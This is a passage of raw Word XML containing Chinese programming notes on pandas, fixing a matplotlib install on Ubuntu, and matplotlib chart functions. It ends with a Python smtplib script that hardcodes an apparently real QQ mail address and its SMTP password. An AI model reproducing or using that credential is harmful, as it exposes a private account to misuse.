      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pandas</w:t>
      </w:r>
      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（推荐）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C186BBF" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0BAB17" w14:textId="04057BF4" w:rsidR="00063FAB" w:rsidRPr="00063FAB" w:rsidRDefault="00063FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pandas</w:t>
      </w:r>
      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>excel</w:t>
      </w:r>
      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的处理，依赖于</w:t>
      </w:r>
      <w:r w:rsidRPr="00063FAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>openpyxl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532AEFCD" w14:textId="77777777" w:rsidR="00063FAB" w:rsidRDefault="00063FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEA6CFB" w14:textId="0E129299" w:rsidR="00754AA3" w:rsidRDefault="0071244B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0071244B">
        <w:t>https://blog.csdn.net/Flag_ing/article/details/124790461</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745EE0BF" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D44BD70" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242DFCDC" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E22030" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7863B489" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51ADC7E4" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C2C229" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734A9F5D" w14:textId="77777777" w:rsidR="00754AA3" w:rsidRDefault="00754AA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D60BF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="568" w:name="_Toc159780001"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>matplotlib</w:t>
      </w:r>
      <w:bookmarkEnd w:id="568"/>
    </w:p>
    <w:p w14:paraId="5F2678AB" w14:textId="77777777" w:rsidR="00545F05" w:rsidRDefault="00545F05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB9608E" w14:textId="1039643E" w:rsidR="00EE4342" w:rsidRDefault="00EE4342" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4342">
        <w:t>https://developer.aliyun.com/article/604809</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50798868" w14:textId="77777777" w:rsidR="00EE4342" w:rsidRDefault="00EE4342" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DDCFA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from matplotlib.widgets import Slider, Button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F738093" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from matplotlib.font_manager import FontProperties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D185182" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FBB45B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516C7E66" w14:textId="77777777" w:rsidR="00545F05" w:rsidRDefault="00545F05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A39E4EC" w14:textId="6F53532D" w:rsidR="00545F05" w:rsidRDefault="00545F05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>buntu22.04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装可能失败</w:t>
      </w:r>
      <w:r w:rsidR="00516DAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，说是没有</w:t>
      </w:r>
      <w:r w:rsidR="00516DAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00516DAB">
        <w:t>reetype2</w:t>
      </w:r>
      <w:r w:rsidR="00516DAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。该错误参考</w:t>
      </w:r>
      <w:r w:rsidR="00516DAB">
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidR="00516DAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>over</w:t>
      </w:r>
      <w:r w:rsidR="00516DAB">
        <w:t>flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAADFEE" w14:textId="46B56026" w:rsidR="00516DAB" w:rsidRDefault="00516DAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00516DAB">
        <w:t>https://stackoverflow.com/questions/61396125/pip-install-error-freetype-and-libpng-missing-windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296F416F" w14:textId="619A04A3" w:rsidR="00545F05" w:rsidRDefault="00516DAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00516DAB">
        <w:t>sudo apt-get install libfontconfig1-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B17F3" w14:textId="77777777" w:rsidR="00545F05" w:rsidRDefault="00545F05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B42CF84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC86711" w14:textId="77777777" w:rsidR="00C44BC3" w:rsidRDefault="00C44BC3" w:rsidP="00C44BC3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>plot()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绘制折线图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5226EB77" w14:textId="77777777" w:rsidR="00C44BC3" w:rsidRDefault="00C44BC3" w:rsidP="00C44BC3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bar()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绘制柱形图或堆积柱形图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A240A79" w14:textId="77777777" w:rsidR="00C44BC3" w:rsidRDefault="00C44BC3" w:rsidP="00C44BC3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>barh()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绘制条形图或堆积条形图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2A06C" w14:textId="77777777" w:rsidR="00C44BC3" w:rsidRDefault="00C44BC3" w:rsidP="00C44BC3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stackplot()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绘制堆积面积图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C10841" w14:textId="77777777" w:rsidR="00C44BC3" w:rsidRDefault="00C44BC3" w:rsidP="00C44BC3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hist()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绘制直方图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1FC73B" w14:textId="76668837" w:rsidR="004C452C" w:rsidRDefault="00C44BC3" w:rsidP="003153A1">
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pie()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绘制饼图或圆环图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCC2081" w14:textId="77777777" w:rsidR="00C44BC3" w:rsidRDefault="00C44BC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F305B8" w14:textId="77777777" w:rsidR="00C44BC3" w:rsidRDefault="00C44BC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072AF8D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="569" w:name="_Toc159780002"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：发送邮件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="569"/>
    </w:p>
    <w:p w14:paraId="1698A10E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786746DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/qq_41187577/article/details/119004959</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D166FA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C5BB06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="570" w:name="_Toc159780003"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考鹏哥提供的代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="570"/>
    </w:p>
    <w:p w14:paraId="4CA4A3DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处可以完成发送功能，但是这里没有考虑群发，也没有写发件人是谁。可以进一步参考下节的“有群发、设置发件人收件人的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632ED7C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17180718" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4E07D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B4DACC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># Define your item pipelines here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593AB793" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA158CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># Don't forget to add your pipeline to the ITEM_PIPELINES setting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D84E26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AB895" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC80F7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206DC57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3FDCC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import smtplib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6905C310" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.text import MIMEText</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1937EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.image import MIMEImage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B831CEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.multipart import MIMEMultipart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF94874" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.application import MIMEApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395D3EF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494565BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def send_mail():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D05F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fromaddr = '2409879947@qq.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BA8356" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    password = 'xotgvgyiydaddiff'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D5355" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    toaddrs = 'shenyanjian@blingsec.cn'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882BC99" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    content = 'today-cve-cnvd'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A89EF75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    file_name = 'test.sql'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B425FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    textApart = MIMEText(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7221FD26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # resFile = file_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF99B62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # resApart = MIMEApplication(open(resFile, 'rb').read())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECACCC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # resApart.add_header('Content-Disposition', 'attachment', filename=resFile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351DCCE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m = MIMEMultipart()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A63A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m.attach(textApart)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DDDE2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # m.attach(resApart)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A13C63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m['Subject'] = 'title'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55968C36" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8DE330" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server = smtplib.SMTP_SSL('smtp.qq.com', 465)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D516DAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server.login(fromaddr, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E93308" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server.sendmail(fromaddr, toaddrs, m.as_string())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685781AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print('success')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0017173B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server.quit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E2E131" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    except smtplib.SMTPException as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE5D577" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print('error:', e)</w:t>
      </w:r>
    </w:p>
